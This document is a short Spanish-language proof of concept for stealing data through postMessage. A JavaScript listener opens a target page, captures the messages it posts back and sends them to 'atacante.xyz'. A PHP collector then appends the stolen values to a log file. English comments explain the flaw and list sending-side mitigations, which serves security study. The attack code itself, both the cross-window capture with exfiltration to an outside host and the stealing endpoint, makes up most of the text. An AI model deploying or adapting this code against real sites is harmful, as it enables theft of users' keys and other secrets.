El siguiente es un PoC para robo de datos utilizando postMessage:
<script>
/**
 * Attacker-side half of the PoC: takes whatever the opened window posts to
 * this window and forwards it to a third-party endpoint.
 *
 * Defender's view: the vulnerable part is not this listener but the sending
 * page (opened below), which presumably posts its data to its opener with a
 * permissive targetOrigin — that is not visible here and should be confirmed.
 * Mitigations on the sending side: pass an explicit targetOrigin to
 * postMessage (never "*"), do not post secrets to `window.opener`, and serve
 * the page with Cross-Origin-Opener-Policy so the opener link is severed.
 * Receivers of postMessage should always validate `event.origin`; this
 * listener does not, which is typical of collector code.
 *
 * @param {MessageEvent} event - message delivered to this window; only
 *   `event.data.value` is read.
 */
function listener(event) {
//alert(event.data.value);
// Assumes the sender posts an object with a `value` property — TODO confirm
// against the sending page, which is not shown on this page.
var str = event.data.value;
var xmlhttp;
if (window.XMLHttpRequest)
{
xmlhttp=new XMLHttpRequest();
}
else
{
// Fallback for legacy IE without XMLHttpRequest.
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
// NOTE: `params` is never declared, so this assignment creates an implicit
// global.
params = "keys="+str;
// Third argument false = synchronous request; deprecated on the main thread
// and blocks the page until the request completes.
xmlhttp.open("POST","http://atacante.xyz/postMessage.php",false);
xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.setRequestHeader("Accept-Language","es-MX,es;q=0.8,en-US;q=0.5,en;q=0.3");
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp.send(params);
}
// Opens the page under test; the PoC relies on that page posting data back to
// its opener. `dest` is assigned but never read afterwards.
var dest = window.open("http://vulnerable.com/keys");
// Registers the forwarding listener for every incoming message, from any
// origin.
window.addEventListener("message", listener);
</script>
<?php
// Receiving endpoint of the PoC: appends the posted `keys` value to a local
// log file. The input is written raw, without validation or escaping, so the
// log contains attacker-controlled text verbatim. Note the variable is named
// $cookie although the PoC sends `event.data.value`; what that value holds
// depends on the sending page, which is not shown here.
if(isset($_POST['keys'])){
$cookie = $_POST['keys'];
// Append mode: every request adds one more line to the file.
$steal = fopen("log.txt", "a");
fwrite($steal, $cookie ."\n"); //<---- Must be $cookie instead of $name
fclose($steal);
}
?>
Información sobre esto: https://github.com/EdOverflow/bugbountywiki/wiki/postMessage-issues